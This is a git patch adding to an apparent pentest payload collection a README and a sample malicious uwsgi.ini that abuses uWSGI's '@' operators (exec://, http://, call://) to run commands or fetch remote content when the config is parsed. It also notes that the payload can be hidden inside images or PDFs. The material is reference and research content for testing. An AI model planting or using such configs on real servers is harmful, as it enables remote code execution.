From 5f8b3f8a142d6620c40059fe345c396c31d6347e Mon Sep 17 00:00:00 2001 From: Maxence Schmitt Date: Wed, 1 Mar 2023 14:49:31 +0100 Subject: [PATCH] add uwsgi configuration file to Upload Insecure File --- .../Configuration uwsgi.ini/README.md | 32 +++++++++++++++++++ .../Configuration uwsgi.ini/uwsgi.ini | 13 ++++++++ Upload Insecure Files/README.md | 3 ++ 3 files changed, 48 insertions(+) create mode 100644 Upload Insecure Files/Configuration uwsgi.ini/README.md create mode 100644 Upload Insecure Files/Configuration uwsgi.ini/uwsgi.ini diff --git a/Upload Insecure Files/Configuration uwsgi.ini/README.md b/Upload Insecure Files/Configuration uwsgi.ini/README.md new file mode 100644 index 0000000000..0407a88a78 --- /dev/null +++ b/Upload Insecure Files/Configuration uwsgi.ini/README.md @@ -0,0 +1,32 @@ +# uWSGI configuration file + +uWSGI configuration files can include “magic” variables, placeholders and operators defined with a precise syntax. The ‘@’ operator in particular is used in the form of @(filename) to include the contents of a file. Many uWSGI schemes are supported, including “exec” - useful to read from a process’s standard output. These operators can be weaponized for Remote Command Execution or Arbitrary File Write/Read when a .ini configuration file is parsed: + +Example of malicious uwsgi.ini file: + +```ini +[uwsgi] +; read from a symbol +foo = @(sym://uwsgi_funny_function) +; read from binary appended data +bar = @(data://[REDACTED]) +; read from http +test = @(http://[REDACTED]) +; read from a file descriptor +content = @(fd://[REDACTED]) +; read from a process stdout +body = @(exec://whoami) +; call a function returning a char * +characters = @(call://uwsgi_func) +``` + +When the configuration file will be parsed(e.g. restart, crash or autoreload) payload will be executed. + +## uWSGI lax parsing + +The uWSGI parsing of configuration file is lax. The previous payload can be embedded inside a binary file(e.g. image, pdf, ...). + +## Thanks to + +* [A New Vector For “Dirty” Arbitrary File Write to RCE - Doyensec - Maxence Schmitt and Lorenzo Stella](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html) + diff --git a/Upload Insecure Files/Configuration uwsgi.ini/uwsgi.ini b/Upload Insecure Files/Configuration uwsgi.ini/uwsgi.ini new file mode 100644 index 0000000000..7301b4c762 --- /dev/null +++ b/Upload Insecure Files/Configuration uwsgi.ini/uwsgi.ini @@ -0,0 +1,13 @@ +[uwsgi] +; read from a symbol +foo = @(sym://uwsgi_funny_function) +; read from binary appended data +bar = @(data://[REDACTED]) +; read from http +test = @(http://[REDACTED]) +; read from a file descriptor +content = @(fd://[REDACTED]) +; read from a process stdout +body = @(exec://whoami) +; call a function returning a char * +characters = @(call://uwsgi_func) \ No newline at end of file diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index 15083b8abd..4813fb096f 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -136,12 +136,14 @@ exiftool -Comment="